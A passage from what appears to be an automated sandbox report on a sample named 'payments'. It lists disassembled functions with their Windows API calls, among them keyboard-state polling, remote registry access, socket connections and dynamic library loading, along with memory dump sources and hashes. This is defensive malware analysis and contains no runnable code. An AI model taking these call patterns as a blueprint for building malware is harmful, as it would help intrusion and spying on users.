                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00CB74AC
                                                                                                                          • _free.LIBCMT ref: 00CB74BF
                                                                                                                          • InterlockedIncrement.KERNEL32(00E83030), ref: 00CB74D7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                          • String ID: 00
                                                                                                                          • API String ID: 2704283638-3810221537
                                                                                                                          • Opcode ID: fd1cea160631009316e393e8bac91de48a210fb94aa748e26f759da3ae2240e7
                                                                                                                          • Instruction ID: fb45d33694133bd6d44934507516b428e1db636d78f88054aa698a4fa7f75eeb
                                                                                                                          • Opcode Fuzzy Hash: fd1cea160631009316e393e8bac91de48a210fb94aa748e26f759da3ae2240e7
                                                                                                                          • Instruction Fuzzy Hash: 9101D636945721ABD712AF6895097DDBB60BF45B12F144205FC24A7790CB345E01EFE2
                                                                                                                          Function 00CF1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CF19F3
                                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CF1A26
                                                                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CF1B49
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CF1BBF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2364364464-0
                                                                                                                          • Opcode ID: 584522baf158bb917a1f132b182f8f373ebf111fddaf4e26c1973d391312e929
                                                                                                                          • Instruction ID: 2dc49ab37377e173dad78398af7e610ec59758f1d480b1d9aab36c2311b29ef3
                                                                                                                          • Opcode Fuzzy Hash: 584522baf158bb917a1f132b182f8f373ebf111fddaf4e26c1973d391312e929
                                                                                                                          • Instruction Fuzzy Hash: A581A4B0600215EBDF10EFA4C886BADBBE5EF04724F088459FD15AF382D7B5A941DB91
                                                                                                                          Function 00CD1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00CD1CB4
                                                                                                                          • VariantClear.OLEAUT32(00000013), ref: 00CD1D26
                                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 00CD1D81
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CD1DF8
                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CD1E26
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4136290138-0
                                                                                                                          • Opcode ID: 51ce1c2ca816fd168b20a873552005bd3124da28ae9d2c1c316e4032b40394fb
                                                                                                                          • Instruction ID: bbff33278426b4e7fbceed1b48c03e4ad875a772a838913e3b5795894526ae6e
                                                                                                                          • Opcode Fuzzy Hash: 51ce1c2ca816fd168b20a873552005bd3124da28ae9d2c1c316e4032b40394fb
                                                                                                                          • Instruction Fuzzy Hash: 6A5139B5A00249AFDB14CF58C884AAAB7F9FF4C314B15855AEE59DB301D730EA51CBA0
                                                                                                                          Function 00CF0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00CF06EE
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00CF077D
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CF079B
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00CF07E1
                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 00CF07FB
                                                                                                                            • Part of subcall function 00CAE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CDA574,?,?,00000000,00000008), ref: 00CAE675
                                                                                                                            • Part of subcall function 00CAE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CDA574,?,?,00000000,00000008), ref: 00CAE699
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 327935632-0
                                                                                                                          • Opcode ID: 39403774ee80b5a917d78dc565b00aa731c0485e869ee99b80f39be4d21c6ac9
                                                                                                                          • Instruction ID: 96bd0da603c5e15fe5b97a0fffebb6a5cbb75fef9945cceec1a973b5bf50e886
                                                                                                                          • Opcode Fuzzy Hash: 39403774ee80b5a917d78dc565b00aa731c0485e869ee99b80f39be4d21c6ac9
                                                                                                                          • Instruction Fuzzy Hash: CE515C75A00209EFCF00EFA8C485DADB7B5BF49710B15809AEA16AB352DB30ED45DF91
                                                                                                                          Function 00CF2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CF3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2BB5,?,?), ref: 00CF3C1D
                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF2EEF
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF2F2E
                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CF2F75
                                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00CF2FA1
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF2FAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3740051246-0
                                                                                                                          • Opcode ID: 83e164f844e2fbe5094e02a5f0b24018712633393c16bff32c08aeb37ea124eb
                                                                                                                          • Instruction ID: d880ad7c5b6632fa6eb6bcc678c855d90fe402df9805fee522f799f6e3df53ce
                                                                                                                          • Opcode Fuzzy Hash: 83e164f844e2fbe5094e02a5f0b24018712633393c16bff32c08aeb37ea124eb
                                                                                                                          • Instruction Fuzzy Hash: DD515C71218204AFDB04EF94C895E6AB7F9FF88314F00881DF69597291DB30E905DB52
                                                                                                                          Function 00CE1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CE12B4
                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CE12DD
                                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CE131C
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CE1341
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CE1349
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1389676194-0
                                                                                                                          • Opcode ID: a77de85d18b52203d84a15eefd4753ce7802e8101e9f735cbe6c173592537b9d
                                                                                                                          • Instruction ID: aeeae8d8699e315941747ef154fed3bbb0e5d0ca239c881adc12aca051f60a36
                                                                                                                          • Opcode Fuzzy Hash: a77de85d18b52203d84a15eefd4753ce7802e8101e9f735cbe6c173592537b9d
                                                                                                                          • Instruction Fuzzy Hash: FB412D35A00605EFCF01EF65C9859AEBBF5FF08314B148099E91AAB361DB31ED11DB50
                                                                                                                          Function 00CAB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetCursorPos.USER32(000000FF), ref: 00CAB64F
                                                                                                                          • ScreenToClient.USER32(00000000,000000FF), ref: 00CAB66C
                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00CAB691
                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00CAB69F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4210589936-0
                                                                                                                          • Opcode ID: 00a95300bd2156992ac5b7ff8b3feadf0a9c349bd99b4ed4ca7085d682c68ea2
                                                                                                                          • Instruction ID: c0366363ccd0205b5c6107eb635b5792b48c7e014fd1b423aaab24c1de230e56
                                                                                                                          • Opcode Fuzzy Hash: 00a95300bd2156992ac5b7ff8b3feadf0a9c349bd99b4ed4ca7085d682c68ea2
                                                                                                                          • Instruction Fuzzy Hash: 0A41603550411ABFDF199F64C844AE9BB75FF06324F10831AF869962D1CB30AD54EFA1
                                                                                                                          Function 00CCB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CCB369
                                                                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00CCB413
                                                                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00CCB41B
                                                                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00CCB429
                                                                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00CCB431
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3382505437-0
                                                                                                                          • Opcode ID: 86ee1a4c7d35abd2a976554849de04932cb0388f456f5e8332b0bedcddd103ff
                                                                                                                          • Instruction ID: 998bbd6170bdc0d01805d78044ce9c164f34a555bdd6aed8da83ecf981c73905
                                                                                                                          • Opcode Fuzzy Hash: 86ee1a4c7d35abd2a976554849de04932cb0388f456f5e8332b0bedcddd103ff
                                                                                                                          • Instruction Fuzzy Hash: 2A31BF71900359EBDB04CFA8D94EBDE7BB6EB04315F108229F921E62D1C7B09E55DB90
                                                                                                                          Function 00CD6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C950E6: _wcsncpy.LIBCMT ref: 00C950FA
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,00CD60C3), ref: 00CD6369
                                                                                                                          • GetLastError.KERNEL32(?,?,?,00CD60C3), ref: 00CD6374
                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00CD60C3), ref: 00CD6388
                                                                                                                          • _wcsrchr.LIBCMT ref: 00CD63AA
                                                                                                                            • Part of subcall function 00CD6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00CD60C3), ref: 00CD63E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3633006590-0
                                                                                                                          • Opcode ID: e8407a29ec76205e5c17d92ec99338154cc0ccf5431c774883e1cdae31f81a73
                                                                                                                          • Instruction ID: 320e367540d8b85c38fed7c6f173e9204dc983e566277803af6588636e3bd778
                                                                                                                          • Opcode Fuzzy Hash: e8407a29ec76205e5c17d92ec99338154cc0ccf5431c774883e1cdae31f81a73
                                                                                                                          • Instruction Fuzzy Hash: D02108315043155BDB15EBB8AC42FEA33ACAF06360F10406BF265C32E1EF70DA81DA65
                                                                                                                          Function 00CE8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CEA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CEA84E
                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CE8BD3
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE8BE2
                                                                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00CE8BFE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3701255441-0
                                                                                                                          • Opcode ID: 9eb2f0a2ee9f52cf933ae2835aee9732139803bdf1ee3cb3ad4fb0b860eb4dfb
                                                                                                                          • Instruction ID: 67ceb1d711aa357f7acf9c64ca52a35097e61fb2000983024ca701825bae62fe
                                                                                                                          • Opcode Fuzzy Hash: 9eb2f0a2ee9f52cf933ae2835aee9732139803bdf1ee3cb3ad4fb0b860eb4dfb
                                                                                                                          • Instruction Fuzzy Hash: A721A131200214AFDB10AF68CC85BBD77A9AF49724F048459F916E73D2CF74AC068761
                                                                                                                          Function 00CE8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsWindow.USER32(00000000), ref: 00CE8441
                                                                                                                          • GetForegroundWindow.USER32 ref: 00CE8458
                                                                                                                          • GetDC.USER32(00000000), ref: 00CE8494
                                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00CE84A0
                                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00CE84DB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4156661090-0
                                                                                                                          • Opcode ID: 8bbbcce49a167ab953302a0d9eb0aae8cdd4530d5bc0f904d06beed3a405214f
                                                                                                                          • Instruction ID: a738bfaf4a9d3fef85fe6f5a24b58c9eef044feef24524f2fd6706b2359f07d3
                                                                                                                          • Opcode Fuzzy Hash: 8bbbcce49a167ab953302a0d9eb0aae8cdd4530d5bc0f904d06beed3a405214f
                                                                                                                          • Instruction Fuzzy Hash: 0D21A175A00204AFDB00EFA5D888AAEBBE5EF48341F04C479E85AD7391DF70AC05DB60
                                                                                                                          Function 00CAAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAAFE3
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00CAAFF2
                                                                                                                          • BeginPath.GDI32(?), ref: 00CAB009
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00CAB033
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3225163088-0
                                                                                                                          • Opcode ID: 5810e31048c35e50504c3768e692549c55a0d7c66b0ca594be5135038ea3fc8e
                                                                                                                          • Instruction ID: 14de609162dd96694113e37b1d339b8171cd866824e4eea4dbe5441225458905
                                                                                                                          • Opcode Fuzzy Hash: 5810e31048c35e50504c3768e692549c55a0d7c66b0ca594be5135038ea3fc8e
                                                                                                                          • Instruction Fuzzy Hash: CB2180B480030AFFDB20DF95EC4879A7B69BB1136AF18431AF825D22A1D3705D91CFA1
                                                                                                                          Function 00CB217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __calloc_crt.LIBCMT ref: 00CB21A9
                                                                                                                          • CreateThread.KERNEL32(?,?,00CB22DF,00000000,?,?), ref: 00CB21ED
                                                                                                                          • GetLastError.KERNEL32 ref: 00CB21F7
                                                                                                                          • _free.LIBCMT ref: 00CB2200
                                                                                                                          • __dosmaperr.LIBCMT ref: 00CB220B
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2664167353-0
                                                                                                                          • Opcode ID: ddc366f99def7ebf3141d6d7076045789f2af7c9f235d3c1cd9f803d2e632cfd
                                                                                                                          • Instruction ID: 9769d0b1e2c6eead8a14d679fbc623dd9521e107b860d285ff6f61d7b4d870f3
                                                                                                                          • Opcode Fuzzy Hash: ddc366f99def7ebf3141d6d7076045789f2af7c9f235d3c1cd9f803d2e632cfd
                                                                                                                          • Instruction Fuzzy Hash: 1F110433144306AF9B21AFA9DC42DEF3B99EF41770F100529FD24C6191EB31D901ABA1
                                                                                                                          Function 00CCABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCABD7
                                                                                                                          • GetLastError.KERNEL32(?,00CCA69F,?,?,?), ref: 00CCABE1
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00CCA69F,?,?,?), ref: 00CCABF0
                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00CCA69F,?,?,?), ref: 00CCABF7
                                                                                                                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCAC0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
